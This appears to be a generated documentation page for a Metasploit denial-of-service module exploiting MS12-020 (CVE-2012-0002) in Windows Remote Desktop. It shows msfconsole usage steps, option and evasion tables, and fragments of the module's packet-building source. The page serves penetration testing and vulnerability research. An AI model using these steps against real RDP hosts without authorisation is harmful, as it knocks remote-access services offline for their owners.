MS12-020 Microsoft Remote Desktop Use-After-Free DoS - Metasploit


This page contains detailed information about how to use the auxiliary/dos/windows/rdp/ms12_020_maxchannelids metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: MS12-020 Microsoft Remote Desktop Use-After-Free DoS
Module: auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Source code: modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
Disclosure date: 2012-03-16
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 3389
List of CVEs: CVE-2012-0002

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show targets
    ... a list of targets ...
msf auxiliary(ms12_020_maxchannelids) > set TARGET target-id
msf auxiliary(ms12_020_maxchannelids) > show options
    ... show and set options ...
msf auxiliary(ms12_020_maxchannelids) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the dos/windows/rdp/ms12_020_maxchannelids auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show info

       Name: MS12-020 Microsoft Remote Desktop Use-After-Free DoS
     Module: auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-03-16

Provided by:
  Luigi Auriemma
  Daniel Godas-Lopez
  Alex Ionescu
  jduck <[email protected]>
  #ms12-020

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   3389             yes       The target port (TCP)

Description:
  This module exploits the MS12-020 RDP vulnerability originally 
  discovered and reported by Luigi Auriemma. The flaw can be found in 
  the way the T.125 ConnectMCSPDU packet is handled in the 
  maxChannelIDs field, which will result an invalid pointer being 
  used, therefore causing a denial-of-service condition.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-0002
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/MS12-020
  http://www.privatepaste.com/ffe875e04a
  http://pastie.org/private/4egcqt9nucxnsiksudy5dw
  http://pastie.org/private/feg8du0e9kfagng4rrg
  http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html
  https://www.exploit-db.com/exploits/18606
  https://blog.rapid7.com/2012/03/21/metasploit-update

Module Options


This is a complete list of options available in the dos/windows/rdp/ms12_020_maxchannelids auxiliary module:

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   3389             yes       The target port (TCP)

Advanced Options


Here is a complete list of advanced options supported by the dos/windows/rdp/ms12_020_maxchannelids auxiliary module:

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show advanced

Module advanced options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/windows/rdp/ms12_020_maxchannelids module can do:

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the dos/windows/rdp/ms12_020_maxchannelids auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> - RDP Service Unreachable


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - RDP Service Unreachable" error message:

133:	      "\x03\x00\x00\x09" +  # TPKT: version + length
134:	      "\x02\xF0\x80"     +  # X.224
135:	      "\x21\x80"            # T.125
136:	
137:	    unless is_rdp_up
138:	      print_error("#{rhost}:#{rport} - RDP Service Unreachable")
139:	      return
140:	    end
141:	
142:	    connect
143:	    print_status("#{rhost}:#{rport} - Sending #{self.name}")

<RHOST>:<RPORT> - RDP Service Unreachable


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - RDP Service Unreachable" error message:

147:	    print_status("#{rhost}:#{rport} - #{pkt.length.to_s} bytes sent")
148:	
149:	    print_status("#{rhost}:#{rport} - Checking RDP status...")
150:	
151:	    if is_rdp_up
152:	      print_error("#{rhost}:#{rport} - RDP Service Unreachable")
153:	      return
154:	    else
155:	      print_good("#{rhost}:#{rport} seems down")
156:	      report_vuln({
157:	        :host => rhost,

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Luigi Auriemma
  • Daniel Godas-Lopez
  • Alex Ionescu
  • jduck
  • #ms12-020

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.